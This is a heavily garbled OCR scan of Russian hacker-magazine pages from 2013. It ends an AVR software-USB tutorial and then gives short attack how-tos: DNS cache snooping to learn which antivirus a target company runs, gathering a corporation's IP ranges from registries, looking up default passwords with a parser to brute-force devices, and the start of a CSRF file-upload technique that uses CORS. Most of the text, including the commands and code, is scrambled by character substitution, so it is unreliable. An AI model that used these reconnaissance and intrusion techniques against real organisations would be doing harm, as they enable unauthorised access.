Ое5Ііпа(іоп 


Ргоіосоі 


ІепдіЬ ІПІО 





1Ѳ 5Ѳ. 8197721. Ѳ 

11 135. 2279 Ь05Т 

12 135. 2357 21. Ѳ 

13 135. 2358 Ь051 
ы 1ЧЧ ултіл й 



Ьо$1 
21. Ѳ 

21. Ѳ 



изв 8ѳ икв сонткоі іп 

изв 64 СЕТ ОЕЗСКІРТОВ «едиея 5Т8ІНС 

изв 94 СЕТ 0Е5СВІРТ0В Ве$роп 5 е 5ТВІНС 

изв 64 СЕТ 0Е5СЯІРТ0К Яе^ие$^ 5ТВІН0 

Г,РТ ПР^ГВТРТГН» йвсплпс» ^ТЯТМГ. 



► Ргате 9: 64 ЬуТе$ ол ѵіге (512 ЬіТ$), 64 ЬуТв5 сарТигед (512 ЫТі) оп іпгег^асе 

► и$в икв 

► ЬпДерие$ТТуре: ѲхсѲ 
ЬЯериезТ: 1 
ѵ(ѴаІие: ѲхѲѲѲѲ 
ѵіпдех: Ѳ 
ѵгі.епдТЬ: 256 






6ѲѲѲ 4Ѳ 58 18 Зе ( 
еѳіѳ а4 9Ѳ Іа 51 ( 
ІѲѲ2Ѳ ѲѲ Ѳ1 ѲѲ ѲѲ ( 
ѲѲЗѲ ѲѲ ѲѲ ѲѲ ѲѲ ( 



53 Ѳ2 8Ѳ 15 Ѳ5 ѲѲ ѲѲ Зс 

6(1 29 Ѳ8 ѲѲ 8(1 и и и 

ѲѲ Ѳ2 ѲѲ ѲѲ ѲѲ ѲѲ ѲѲ ѲѲ 



...ѳ 



изв (изЬ). в Ьуів5 



Раскеі5: 16 Оі5|Яауе(і: ... ^ РгоЛІе; ОеГаиК 



Перехват и8В-пакетов в ѴУігезЬагк 






5 » 
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РННЕАКШС 



и5В_ЕМРР0ІЫТ_ІМ, 

0АТА_оит, 0, (сМг *)Ьи-Р-Рег,..<е. 

зііео^СЬи'Рі^бг) ^ 5000); 

ргігѵЬ-РС'Со-І: %6 Ьуііез: %5 \п"і пВу1:е5д Ьи-Р-Рег)! 

. . У / Ар ГУ ме н т,„і п от п Р а вить строку 

УУ„.Хследуший.аргуме^ 

} еІ5е і Р(5•^:гстрСаг§ѵ[1]^ "іп") == 0 && аг§с > 

.-МЛ 

пВуСез = и5Ь_соп-Сго1_т5§(Иапс11ед 

и5В_ТУРЕ_ѴЕМ00В 1 и5В_КЕСІР_0ЕѴІСЕ 1. е. 

и5в_Еморош^оит^ 

^АТА_IN^ 0^ 0, агбѵ[2І^ 5І:г1еп(аг8ѵ[2])+1^ 

5000); 

} 



Іі(пВу1:е5 < 0) •Рргіп'СХ^^^ "%5\п'% 

и5Ь_5І:геггог()); 

У5 Ь_с І05 е ( ЬапсІ 1е ) ; .УУ За крьіть дес кри птор 

геСи„гп 0; 

} — 



Здесь правит бал функция и5Ь_соп1го1_гп8д, которая объяв- 
лена во включаемом файле изЬ.Іі. Она имеет кучу параметров 
и собственно создает те управляющие сообщения, обработка 
которых реализована в прошивке микроконтроллера. 

СОБИ РАЕМ, П РОШ И БАЕМ , ТЕСТИ РУ ЕМ 

Ниже приведен небольшой, но очень полезный Маке^ііе, с помо- 
щью которого командой таке из таіп.с и изЫезІ.с легко полу- 
чить прошивку для чипа — таіп.Ііех и бинарник утилиты изЫез^ 



СС = аѵг-ёсс 

ОВЗСОРУ = аѵг-оЬзсору 

СР1АС5 = -Іліаіі -05 -ІизЬсІгѵ -шси=а-С1:іпу2313 

ОВЗРІАС5 = -3 .Сехі: -3 .сіаіа -0 іИех 

ОВД ЕСТ5 = и 5 ЬсІ г ѵ/ и 5 ЬсІ гу . р и 5 ЬсІ г ѵ / осі сі е Ьи§ . о 

изЬсІгѵ/иБЬсІгѵазт.о таіп.р 

СМОІІМЕ = изЫез-С 



# ..Цел ь ; с обрать . вс.€ 

а11: таіп.Мех $(СМ^^INЕ) 



#-.С6ррка„утилиты..д^^^ 

$(СМ01ІМЕ): изЬ-СезИ.с 

ЕС с - 1 . У 1 і Ь и 5 ЬУ і п с 1 и сі е - 1 , /1 і Ь и з ЬУ 1 і Ь/ §с с е 
-О -кіаіі изЫіез-С.с -о изЬ^СезІ: -ІизЬ 



#..Оч,иртиіь..пррекх„от .бинарн 

сіеап: 

ІСВЮ-- * • Р * • Ьех * , о .. 



# По л у ч е ни е ..фа й л а ..прош и в к и и з. е 1 -Р - файла 

%.Иех: %..р1іР 

$(0ВЗС0РУ) $(ОВЗРІАС5) $< $@ 

#..С.6ор.к.а...е.1-Р.т.ф.а.й.л.а 

таіп.еІіР: $(ОВЗЕСТ5) 

На уровне логики протокол 
Ѵ5В — это, по сути, много- 
уровневая пакетная передача 
данных. В этом нетрудно 
убедиться (а заодно узнать 
много интересного про ІІ5В), 
воспользовавшись анализа- 
тором сетевых протоколов 
ШгезНагк 



пе^^пеі^у ~ $ зийо аѵгс1и(1е -р ^2313 -с изЬ^іпу -У ІТизегѵуіѲхе'Г :т 
аѵгсіисіе: АѴВ Уеѵісе іпігіаіігесі апсі геаУу ассер-1 іпз-^гисгіопз 



Кеасііпд 



100% 0.0І5 



аѵгсіисіе: Оеѵісе зідпаСиге = 0х1е91Оа 
аѵгсіисіе: геасііпд іприі: Тііе "Охе^” 
аѵгсіисіе: мгі1:іпд І^изе (1 Ьу1:е5): 

мгііііпд I \ 100% о.ооз 



аѵгсіисіе: 

аѵгсіисіе: 

аѵгсіисіе: 

аѵгсіисіе: 

аѵгсіисіе: 



1 Ьуііез оТ І-Ризе Ѵ7гі1;-Сеп 
ѵегі^уіпд ІТизе тетогу адаіпз'І ОхеТ: 

Іоасі (ІаСа І^изе сіаіа Тгот іприі Іііе 0хе1: 
іприі Іііе Охеі сопіаіпз 1 Ьуіез 
геасііпд оп-сЬір Низе сіаіа: 



Веасііпд 



100% 0.005 



аѵгсіисіе: ѵегііуіпд ... 

аѵгсіисіе: 1 Ьуіез о1 Низе ѵегіііесі 



аѵгсіисіе: заіетосіе: Ризез ОК 
аѵгсіисіе сіопе. ТЬапк уои. 



Работа с программатором аѵгсіисіе 




ЛОЖКА ДЕГТЯ 

Софтовый 118В не есть 
панацея. Программные 
реализации обычно 
имеют ряд упрощений, 
таких как отсутствие 
проверки контрольной 
суммы и симметрич- 
ности канала, что отри- 
цательно сказывается на 
помехозащищенности. 
Также обычно софтовые 
библиотеки использу- 
ют низкоскоростные 
режимы работы 118В. Да 
и код 118В-библиотеки 
«кушает» и без того не- 
большую память чипа. 



$(СС) $(СР1АС5) $(ОВЗЕСТ5) -О $@ 



# .С.борк а . фа й л о в библиотеки V -II 5 В 
$ С0ВЗ.ЕСТ5.І.: и.з.Ь.сІгѵ/ из Ь 



# . .С. . . .в . . .0 б .ъ е к т .н.ый код 

%.о: %.с 

$(СС) $(СР1АС5) -с $< -о $@ 



# азт в объектньій ..код 

%.о; %.5 

$(СС) $(СР1-АС5) -X аззетЬІег-ѵ/іІЬ-срр -с $< -о $@ 

Чтобы залить прошивку в микроконтроллер с помощью про- 
грамматора изЬЬпу, набираем команду: 

$ зисір аѵгсіисіе -р Х2313 - изЬ-Ііпу -е -II ^ 
ЛазЬііллтаіп.Ьехіі -I) 1-Ризе:м:0хе-Р:п1 

В аѵгсіисіе фьюзы задаются не слишком наглядно, но их мож- 
но легко рассчитать в одном из опііпе-калькуляторов. 

Подключаем устройство к компьютеру и проверяем, как оно 
работает (изЫезІ с параметром оиі считывает строку, іп — за- 
писывает указанную строку в буфер чипа): 

$ зисіо ./изЫезІ іп а11_ок 

$ зисіо ./изЫезІ ои'І 

ПОДГЛЯДЫВАЕМ... 

На уровне логики протокол ІІЗВ — это, по сути, многоуровне- 
вая пакетная передача данных. В этом нетрудно убедиться (а 
заодно узнать много интересного про УЗВ), воспользовавшись 
анализатором сетевых протоколов ѴѴігезЬагк. Предварительно 
необходимо загрузить драйвер ІІЗВ-монитора: 

$ зисіо тосІргоЬе изЬтоп 

Теперь в списке интерфейсов ѴѴігезИагк можно выбирать 
шины иЗВ. Посмотреть номер шины устройства можно, напри- 
мер, в логах. 

ЗАКЛЮЧЕНИЕ 

Надеюсь, после того, как ты научился пересылать данные 
между компьютером и микроконтроллером АѴР, твоя страсть 
к электронике разгорится с новой силой, породив немало ори- 
гинальных и полезных устройств. Остается лишь пожелать тебе 
успехов на этом сложном, но интересном поприще. ^ 
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ШАІШШС 

Вся информация предо- 
ставлена исключительно 
в ознакомительных целях. 

Ни редакция, ни автор не несут 
ответственности за любой воз- 
можный вред, причиненный 
материалами данной статьи. 
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РЕШЕНИЕ 

Давай для четкости определим ситуацию для примера. Хотим мы проникнуть 
в какую-то корпоративную сеть. Первый шаг, конечно, — собрать побольше 
информации о ней. И было бы очень полезно если бы мы смогли удаленно 
определить антивирус, используемый в этой сети. Зная версию антивируса, 
мы можем проверить в домашних условиях и модифицировать, если надо, 
свои эксплойты, которыми будем проводить атаку на организацию. 

Как это сделать? По мне, так простейший способ — написать письмо в 
организацию, о чем-нибудь пространном, но таком, чтобы им захотелось от- 
ветить. В ответном письме в заголовках очень часто отображается версия 
антивируса, который проверил письмо при отправке. Кроме того, иногда до- 
ступна инфа об используемом мэйлере и антиспам-системах, что тоже может 
пригодиться (см. рис. 1). 

Но есть и другие способы. Один из них основывается на использовании 
атаки 0М5 сасИе зпооріпд. Цель этой атаки проста — мы удаленно можем уз- 
навать, какие домены были недавно отрезолвлены на ОМЗ-сервере компа- 
нии, то есть на какие домены недавно заходили. Но для начала давай попро- 
буем понять кое-какие общности и тонкости работы ОМЗ. 

Итак, все мы знаем, что ОМЗ используется для преобразования имени сер- 
вера в ІР-адрес. Например, если мы захотим зайти на сайт вики — ги.ѵѵікіресііа. 
огд, то наша ОС сделает запрос к нашему ОМЗ-серверу «а какой у ги.ѵѵікіресііа. 
огд ІР7». Так как наш ОМЗ-сервер не знает этого, то он обратится за этой ин- 
формацией к одному из корневых ОМЗ-серверов и запросит ту же информа- 
цию. Корневой ОМЗ-сервер, так как он тоже не отвечает за ги.ѵѵікіресііа. огд, 
сможет сообщить только ІР-адрес ОМЗ-сервера, ответственного за всю зону 
.огд. Наш ОМЗ-сервер после этого обратится уже к нему. ОМЗ-сервер зоны 
.огд уже сможет сообщить, какой ОМЗ-сервер отвечает за зону ѵѵікіресііа.огд. 
И наконец, наш ОМЗ-сервер подключится к ОМЗ-серверу, ответственному за 
зону ѵѵікіресііа.огд, и узнает у него ІР-адрес зоны ги.ѵѵікіресііа.огд. 

Логика работы, я думаю, тебе должна теперь стать понятной: твой ОМЗ- 
сервер выполняет подключения к другим ОМЗ-серверам и поставляет тебе 
только итоговый ответ. Но здесь еще ряд важных тонкостей. 

Во-первых, ты видишь, какой длинный путь необходимо пройти, чтобы 
получить ІР-адрес конечного узла «ги.ѵѵікіресііа.огд»? Чтобы не проходить его 
каждый раз при запросе ги.ѵѵікіресііа.огд, твой ОМЗ-сервер кеширует эту за- 
пись. И в следующий раз информация уже берется оттуда. Хотя здесь необ- 
ходимо отметить, что у кеша есть свое время жизни, то есть если через месяц 
ты зайдешь на ги.ѵѵікіресііа.огд, то инфа возьмется не из кеша, а опять будет 
запрошена из инета. 



Х-Маі1ег: Кісгозоіт Оисіоок 14.0 
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Согхепі:-2аг:диаде : ги 

Х-АпСіѴігиз: аѵазг! (ѴР5 121213-1, 13.12.2012), ОисЬоипсі іг.еззаде 
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Рис. 1 Пример заголовков е-таіГа 



' ап5«ег : 

НЕАОЕЙ: 

орсогіе = ОІІЕКУ, ісі = 3, гсоЦе = МОЕКЙОК 

Неасіег -Падз: гезропзе, «апі: гесигхіоп, гесигзіоп аѵаіі. 

рие 5 і:іоп 5 = 1, апзілегх = 1, аи1:Иогі1:у гесогЦь = 2, аЦЦі^іопаІ = 2 

0иЕ5ТІОЧ5: 

рагот. Ьагсеіопа.сояі, 1:уре = А, с1а55 = ІЧ 
АЫ5«ЕК5: 

-> рагот. Ьагсеіопа. сот 

іпТегпеІ: а(1<іге55 = 193.27.78.225 
«1 = 16 С16 5ес5) 

АиТНОЙІТУ ЙЕС0К05: 

-> Ьагсеіопа. сот 

патеэегѵег = П52. Ьагсеіопа. сот 
■М:! = 16 (16 5ес5) 

-> Ьагсеіопа. сот 

патеьегѵег = П5. Ьагсеіопа. сот 
1 : 1:1 = 16 (16 5ес5) 

АООІТІОЧАІ КЕС0К05: 

-> П5. Ьагсеіопа. сот 

іпТегпеІ: аёсігезз = 193.27.78.225 
ТІ:! = 698 (11 тіп5 38 5ес5) 

-> п 52. Ьагсеіопа. сот 

іпЬегпеІ; асіс1ге55 = 193.27.78.226 
11:1 = 698 (11 тіп5 38 5ес5) 



' заслуживающий доверия ответ: 
Ьь : рагот. Ьагсеіопа. сот 

; 5: 193.27.78.225 



Рис. 2 . Определение посещаемых доменных имен по уменьшенному значению ТТ^ 



Во-вторых, чем отличается твой ОМЗ-сервер, который выполняет за тебя 
всю работу по поиску ІР по имени, от других серверов, включая ОМЗ-серверы 
зоны .огд и корневого? По сути — ничем. Но почему они сами не начинали, так 
же как и твой ОМЗ-сервер, искать для тебя необходимый ІР-адрес? Разница в 
том, что когда ты запрашивал «ги.ѵѵікіресііа.огд» у своего ОМЗ-сервера, то твоя 
ОС сделала рекурсивный запрос, а когда твой ОМЗ-сервер запрашивал инфу 
у других ОМЗ-серверов, то запросы были нерекурсивными, итеративными. 

Разница, я думаю, понятна. Рекурсивные запросы требуют от ОМЗ- 
сервера, чтобы он нашел ІР-адрес по имени, а итеративные запросы просто 
запрашивают «ближайший» ОМЗ-сервер, ответственный за зону по мнению 
ОМЗ-сервера. 

Например, сделай нерекурсивный запрос для хоста рагот. Ьагсеіопа.сот: 



пБІоркир .-пргесигзіуе рагот. Ьагсеі^^ 



И твой ОМЗ-сервер ответит тебе списком корневых ОМЗ-серверов. 
Результат же рекурсивного запроса: 



пБІоокир -погесиг5Іѵе рагот. Ьагсеіопа. сот 



выдаст тебе ІР-адрес «рагот. Ьагсеіопа. сот» (см. рис. 3). 

Хорошо, с общей теорией мы разобрались. Теперь переходим к самой 
атаке ОМЗ сасЬе зпооріпд. Как уже было сказано, с помощью ее мы можем 
узнать, какие же доменные имена были недавно прорезолвлены данным 




ХАКЕР 04/171/2013 



Еазу Наск 



Ѳі 



ОМ8-сервером. С технической точки зрения есть 
три метода ее провести. 

Первый и самый простой — если атакуемый 
0М8-сервер позволяет резолвить нерекурсивные 
запросы. Тогда все, что нам необходимо, — это 
посылать нерекурсивные запросы на него с раз- 
личными доменными именами. И если сервер 
ответит нам списком корневых ОМ8-серверов, 
значит, имя не хранится в кеше, значит, на данный 
хост не заходили в ближайшем прошлом. Если же 
ответит конкретным ІР-адресом, значит, данные 
есть в кеше и на хост недавно заходили. Пример 
показан в третьем запросе рисунка 3. После про- 
ведения рекурсивного запроса итог был закеши- 
рован, и поэтому второй нерекурсивный запрос 
показал те же данные. 

Но если нерекурсивные запросы нам недо- 
ступны, то мы можем воспользоваться и рекур- 
сивными, используя второй и третий метод. 

Второй метод заключается в том, чтобы в за- 
просе контролировать значение ТТІ. Когда 0М8- 
сервер выполняет рекурсивный запрос, то он 
кеширует данные. Но то, как долго они будут хра- 
ниться в кеше, определяет конечный 0М8-сервер, 
указывая соответствующее значение ТТІ. А мы, 
делая запросы к атакуемому серверу, смотрим на 
значение ТТЕ. Если оно равно тому, которое уста- 
навливает ОМ8-сервер перебираемого доменно- 
го имени, то, значит, атакуемый ОМ8-сервер толь- 
ко получил эту информацию, если же ТТІ меньше 
исходного — значит, взято из кеша (рис. 2). 

Ну и последний метод — сверхлогичный. Для 
чего кеш в ОМ8-сервере? Для того, чтобы быстрее 
генерировать ответы. Этим-то мы и воспользуем- 
ся. Несколько раз запрашиваем какое-то имя ре- 
курсивно и смотрим — насколько быстрее сервер 
нам ответил. Если разница между первым и вто- 
рым запросом есть, то записи в кеше не было. Если разница между запро- 
сами отсутствует, то значит, вся информация взята из кеша. 
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гіхЕ: іЛг-300 

е55: 192.168.0.1 

: рагоп.ЬагссІопа.соп 

Ьу; 

<1. д+І4І-5егѵсг5. пгі" 

192,31.80.10 

гои 

с, д11гі-5егѵег5. пеі 

197.26. 92.30 
сота 

і . <ГН <1 - 5егѵег5 . пеі 

192.43.172.30 
гол 

а. дСІ «і-іег ѵег $ . пеі 

197.5.6.30 
2001:503;а83е::2:30 
сое 

Г. дЫ<1-5егѵег5. пе^ 

192.35.51.30 
сое 

k. дНс1-5сгѵег5, пеі; 

192.52.178.30 
со» 

l. ук1<і-5егѵег5.пв1 

197.41.167.30 



Ь. д^І (і-5егѵвг5 . пе± 

192.33.14.30 
2001:503:231с1;:2:30 

СОШ 

Ь.дСІ<1-5егѵвгх. пеі 

192.54.117.30 



:УШі-пг1сюкир -гесиг5Іѵе рагош.ЬагсеІопа.сот 
тхЕ: СІІ г-300 

; 8: 192.168.0.1 

заслухисаіои»ій доверия ответ: 
рагот. Ьагсеіопа. сот 
!і: 193.27.78.275 



и5ег5^М»-п8Іоокир -погесигвіѵе расою. Ьагсеіопа. соя 
тхГ: СІ1Г-300 

е55: 192.168.0.1 

заслуживаюимй доверия ответ: 

: расою. Ьагсеіопа. соя 

е55: 193.27.78.225 



Рис. 3. Разница между различными 
типами запросов 



Прикольно было 
ного по... 



Как видишь, все очень просто, а главное — ра- 
ботает! Теперь пара слов о минусах техники. Они 
есть, и во многом их сложно обойти. Во-первых, 
нам необходимо иметь сетевой доступ к атакуе- 
мому 0М8-серверу. Это на самом деле прилич- 
ное ограничение, так как у многих 0М8-сервер 
спрятан за файрволом в корпоративной сети. Во- 
вторых, даже если он торчит наружу, в настройках 
должно быть разрешено резолвить сторонние 
хосты. Ведь часто резол в разрешен только для 
внутреннего диапазона ІР-адресов. 

С другой же стороны, из внутренней сети вро- 
де как не существует методов защиты от таких 
атак. А тот же 0М8 от Микрософта уязвим к этой 
атаке по умолчанию, но исправлять эту ситуацию 
они не собираются. 

Теперь практика. Дабы руками не возиться с 
перебором доменных имен у ОМ8-сервера, до- 
брые люди написали ряд тулз. Например, есть 
скрипт для Мтар’а, который поддерживает пер- 
вый и третий методы. Но я отмечу тулзу от Роба 
Диксона (РоЬ Оіхоп), которая хоть и поддержи- 
вает тот же функционал, все-таки более удобна: 
ооо.оІ/кМХгВ . 

,/5сгаре.5И -1: ѵісТіт^ОМЗ -и 

где -1 — указываем атакуемый ІР; 

-и — определение используемых антивирусов. 

Самым большим плюсом тулзы является 
сформированный список доменных имен серве- 
ров обновления различных антивирусов. Таким 
образом, проведя эту атаку, ты сможешь понять, 
какие доменные имена используются для обнов- 
ления антивируса, то есть какой антивирус стоит в 
атакуемой корпоративной сети, 
бы аналогичные списки получить и для другого критич- 



ПОЛУЧИТЬ список ІР-АДРЕСОВ 



РЕШЕНИЕ 

Любой из нас, кто систематически смотрит ани- 
ме, давно уже знает и понимает, что крупные 
корпорации — это вселенское зло, цель которого 
как минимум поработить человечество. И един- 
ственные, кто может противостоять им, не считая 
киборгов и генетически измененных людей со 
сверхспособностями, — это хакеры. То есть на 
нас с тобой лежит большая ответственность :). 

Но сила корпораций и их же проблема. Они 
становятся такими большими, что множествен- 
ные головы их даже не знают, что делают их хво- 
сты. Этим-то мы и воспользуемся. И один из 
первых шагов — получить список ІР-адресов, 
принадлежащих компании. Ведь, как ни странно, 
большинство уважающих себя компаний имеют 
свои диапазоны ІР-адресов. Но как найти их? Да, 
мы можем найти официальные сайты и через них 
получить диапазоны ІР-адресов, используя ѵѵИоіз- 
сервисы. Но этого маловато. У таких компаний 
часто есть ІР-диапазоны для всяких системных 
нужд, и они особо нигде не светятся. 

Для того чтобы получить полную информа- 
цию, мы можем обратиться к интернет-регистра- 
торам. Это такие некоммерческие организации, 
которые выделяют диапазоны ІР-адресов, ре- 
гистрируют серверы геѵегзе ОМ8 и отвечают за 
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шѵі»Ф*гАРРи СО-Иег в»<спДор<*С<иприЮгО» 



ЮЮпит 194 11 і.1»6.0-194 115 18бг55 
Мг^^АррІ» Сотроюг 



іміиу т І И 1 И .78. Р - т 11 Я>. 7е,25$ 

пв и ттв»АРР1Ж-Ие7 голяПа^ТШітіяитЬогОФопігюі^огЮііропЫіюЕПе вявіотгвт 
тРЕ вокг^Аррі» Сотриш в о 5-*6ЛЭ гци лррн Соліримг імот 



яцітші ИТ 'і- г. !54 10^87 

гтѵ»тв^втщАі.шмсеам>Ріе^оіАР</пт лрртсоящшітг 




пвепвтг^Ея лрріі.со»тгтея^иновЕ ягкгшАРРи соллрцтЕяеѵювв 



ІМ8мт.80.164.212Ю0-МШ 213.207 

< іи і шт ’Л РРи .сошшятяшилі-лр-АРРи жтс^арр/» сотриш пш в^Аррнсоярш 
гшноіів 



Масса целей на выбор 



ѵѵИоіз-информацию. Регистраторов этих пять, и 
каждый отвечает за свой кусок мира: 

АКІМ - для Северной Америки; 

КІРЕ - для Европы, Ближнего Востока 
и Центральной Азии; 

АРМІС - для Азии и Тихоокеанского 
региона; 

ЕАСМІС - для Латинской Америки 
и Карибе ко го региона; 

А-РгіМІС - для Африки. 

Проблема обычного ѵѵііоіз в том, что поиск 
общей и контактной информации происходит 
по ІР-адресу, нам же надо проделать обратную 
операцию. И как раз через регистраторов мы 
можем это провернуть. На их сайтах есть воз- 
можность искать диапазы по именам сетей и 
организаций, по е-таіГам ответственных ад- 
минов. 

Что еще приятнее, базу со всем ѵѵРоіз’ом ре- 
гиона можно скачать. У РІРЕ доступен на Йр, у 
АРІМ по неофициальному запросу. А в качестве 
домашнего задания можешь попробовать най- 
ти всю инфу по какой-нибудь корпорации, типа 
Арріе. 




Взлом 
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ПОДОБРАТЬ ПАРОЛЬ 



РЕШЕНИЕ 

Всякие простые и дефолтные пароли — это один из паразитов безопасно- 
сти. Конечно, многие вендоры в своем ПО поменяли подход и теперь пере- 
кладывают ответственность на пользователей, заставляя тех при установке 
задавать пароли. Но «в среднем по больнице» ситуация плачевна, особенно 
для всевозможных девайсов. 

Проводя пентест внутри крупных компаний, сталкиваешься с кучей раз- 
личного ПО, различных устройств, подключенных к корпоративной сети. 
И ведь все нужно посмотреть, потыкать, поподбирать дефолтные пароли. 
Ведь можно и принтеры покакать, и читать чужие документы. И сетевое обо- 
рудование можно переконфигурить для своих нужд. Не говоря уж о том, что 
иногда можно найти девайсы, ответственные за контроль «крутилки» на про- 
ходной, со всеми приятными последствиями. В общем, девайсов очень мно- 
го, а времени мало. 

Вот поэтому и хотелось обратить общее внимание на появившийся про- 
ект ОРЕ (беіаиіі раззѵл/огсі епитегаііоп) — ооо.оІ/Раіоа от ѵулллл/.ІооІзѵѵаІсИ.огд. 
Здесь нет ничего очень необычного. Просто база данных дефолтных учеток. 
Но это как раз то, что необходимо. Дефолтные пароли привязаны к вендорам, 
типам девайсов и ПО, описанию, СѴЕ, СРЕ. Формат хранения удобен для вне- 
дрения в стороннее ПО (всевозможные сканеры и брутфорсеры). 

Самое трудное здесь — поддержание проекта в дельном состоянии. Что- 
бы информация была правдива, а списки пополнялись. Но есть надежда, что 
это как раз оно. Челы даже добавились в проекты на МІТРЕ ( аоо.аІ/ѴУЦикЭ ). 
Сейчас же это выглядит просто: с1ре_с1Ь.хт1 — база данных (1920 дефолтных 
учеток) и парсер для нее ОРЕрагзег.ру. 

ОРЕрагзег.ру 



-V - поиск по вендору 

-1; - по типу 

-с- по СРЕ 

-сі - по описанию 

-и - обновление базы 




- • ххх>руТНоп сіре. ру -и 



[+] ир<іаі:іпд Тгогг оТТтсіаІ ІосаТюп Ні:1:р:/ 'ѵл>%ѵ. 1ооІ5лаТсН.огд,<<іре/(1ре_(іЬ. кті 
[-] Оснѵпіоасііпд: с1ре_с1Ь. хті ВуТех : 440994 
440994 ГІОО.00%3 

: 'ХХХ>руТНоП СІре.|Іу 
аде: (іре.ру ГОр1:іоп5] Тііепате 

ѵ : ТТОП5-: 

— ѵегзіоп зЬслѵ ргодгат’і ѵегхіоп питЬег апсі ехіі: 

-Ь, --Иеір 5Но«’ ТЬі5 Неір теззаде ап<і ех-іі: 

-с 5ЕАЙСНСРЕ, — сре=5ЕАЙСНСРБ 

5еагсН Тог СРЕ сІеТаиН раз5ѵі*ог(І5 
ех :сре:/Н:сізсо:гои1:ег_4000 

-V 5ЕАКСНVЕNСЮЙ, - -ѵет1ог=5ЕАЙСНV'ЕN[Xт 

ЗеагсЬ Гог Ѵепсіогз сІеГаиІІ: раззлогііз Сех: сізсо, 
арріе. . .) 

-С 5ЕАКСНТУРЕ, — Гуре=5ЕАКСНТѴРЕ 

ЗеагсН Гог Туре сІеГаиІі^ раззѵлігсіз (ех:гоиГег, зліГсИ, 
НиЬ...) 

5ЕАЙСН0Е5С, --сіезсгірП оп=5ЕАЙСНОЕ5С 

ЗеагсН Гог «іезсг-ірііоп Сех:сізсо гоиГег 2600...) 

-и, -~ир<1а'1:е и^аГе ОРЕ хті сопГепГ 

заде: сіре.ру ГОрГіопз] ГЛепате 

.ру: еггог : 'і]- Ѵои тизГ зирріу а раГГегп То зеагсН Гог. 

: ‘ХХх>руіНоп (іре. ру -Г 5»тГсН 

ЗеагсНіпд сіеГаиІТ сгесІепТіаІз Гог зѵѵіТсН 
Г+З СгеаГіпд оиГриТ ГЛе раззІізГ. ТчТ 



епсіог : Зсоя’ 

1: зирегзТаск ті геѵ. 1100/3300 
зѵі'іТсИ 

: сре:/И:Зсоіп:Зс16950 
е: 

егпате: Зсотсзо 
5«ога: КІРООО 

оТосоІ : сопзоіе оп Тср/исір рогГ: 



епйог : Зсот 

•1; Зсснг; зирегзГаск 3 зѵѵіТсН ЗЗООхті 
■уре: з^чпТсЬ 

. е: ‘ сре: ■'И:3со<п:3с1б980а 
е: 

: егпате; зесигіТу 
ЗѴѴОГСІ: зесигіТу 
оТосоІ : тиІТі оп Тср/исір рогТ: 



: Зсот 

1; зирегзТаск 3 зѵ^іГсН геѵ. ЗЗООхт 
уре: зл'іТсН 

ре: ере :,'Ь: Зсот :3с1б980а 

. егпате: агітіп 
- 5ѵ«огсі: а{1тіп 

оТосоІ : тиНі оп Гер/игір рогТ : 



Получаем список дефолтных учеток 



С$РР НА ЗАГРУЗКУ ФАЙЛОВ 



РЕШЕНИЕ 

Годы идут, технологии меняются и становятся тех- 
нологичнее... И если раньше считалось, что Зате 
огідіп роіісу бережет разработчика, что нельзя де- 
лать кросс -доменные запросы (ХМШТТРВедиезІ) 
с помощью иаѵаЗсгірІ. Конечно, многие раз- 
работчики удивлялись, когда хакер «из рукава» 
доставал обычные С5ПР-ки СЕТ-запросом или 
делал чуть более продвинутые РОЗТ-запросы 
через автоматически отправляемую формочку с 



правильным Сопіепі-Туре. Но все-таки была не- 
сокрушимая стена, так как ХМШТТРРедиезІ и 
правда не разрешался на сторонние домены, а 
потому мы не имели возможности делать загруз- 
ку произвольных файлов, используя СЗРР. Ведь 
в браузере, чтобы загрузить файл, пользователь 
должен его выбрать с помощью соответствующе- 
го диалогового окна. . . 

Но годы прошли, и власть переменилась. Вы- 
шел стандарт НТМЕ5, который позволяет нам 



теперь совершать кросс-доменные запросы. 
ХМЕНТТРВедиезІ разрешено делать на любой 
хост. Это является частью стандарта СОРЗ (Сгозз 
Огідіп Резоигсе ЗИагіпд). Вообще, она было сде- 
лана для того, чтобы из ^аѵаЗс^ірГа можно было 
получать данные с других доменов. Но СОРЗ соз- 
дан с вниманием к безопасности. А потому для 
примера предположим, что ^аѵаЗс^ір^ с хоста А 
пытается получить информацию с хоста Б. Про- 
изводится запрос, используя ХМШТТРРедиезІ, 
на хост Б. В запросе на хост Б добавляется новый 
заголовок — Огідіп (то есть имя сайта, с которого 
делается запрос). В свою очередь, ответ от хоста 
Б может иметь заголовок «Ассезз-СоШгоІ-АІІоѵѵ- 
Огідіп», в котором указываются сайты (или * для 
всех сайтов), которыми может быть получена ин- 
формация с хоста Б. То есть браузер пользовате- 
ля по этому заголовку может решить, разрешено 
ли яваскрипту с хоста А получить ответ от Б. Здесь 
важно отметить, что отсутствие Ассезз-Сопігоі- 
АІІоѵѵ-Огідіп приводит к запрету для всех хостов. 

Получается, что СОРЗ вполне секьюрная 
технология. Но, как ты, наверное, заметил, для 
реализации ее создателям пришлось нарушить 
старые запреты и разрешить кросс-доменные 
запросы. Да, ответ мы не получим, но запрос по- 
слать можем. По сравнению с обычным СЗРР, ис- 
пользование возможностей иаѵаЗсгірІ позволяет 



Р05Т /ирІоасІ.рЬр НТТР/1.0 

Узег-Адепі:: МогіІІа/5.0 (ѴѴіпсІоѵѵз ГѴГГ 6.1; ѴѴОѴѴ64; гѵ:2.0.1) Сеско/20100101 Ріге^ох/4.0.1 
Ассері: 1ех1/НРп1,аррйса1:гоп/хЫтІч-хт1,аррІісаЬоп/хтІ;д=0.9,*/*;ч=0.8 
АссерЫ-апдиаде: ги-ги,ги;д=0.8,еп-и5;д=0.5,еп;д=0.3 
Ассеріі-Епсосііпд: дгір^ сіеЯаІе 

АссерІ-СНагзеІ: \лмпсІоѵѵ5-1251,и^-8;д=0.7,*;д=0.7 
Кеер-АІіѵе; 115 

Сопіепі-Туре: тиНірагіуі^огт-сІаІа; Ьоипс1агу= 228852196221080 

СопІелІ-СепдНп: 437175 



228852196221080 

СопІепІ-ОізроБгЬоп: ^огт-сіаіа; пате="ирІоасІесІ_бІе’‘; б1епате=’‘г2ггг.)рд" 
СопІ:епІ:-Туре: ітаде/іред 



228852196221080- 



Рис. 1 . Загрузка стандартными средствами формочек 
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РОЗТ /ирІоай.рПр НТТР/1.0 

Озег-Адепс: Но2і11а/5.0 (Ѵіпйоѵз N7 6.І; НОН64; гѵ:2.0.і) 0еско/20100і01 Гігв«ох/4 .0. 1 
Ассерс : сехс/1іст1, арріісас іоп/хНМпІ+хіпІ, арріісачоп/хгпі; д-0 .9, •/ *; д-0 . В 
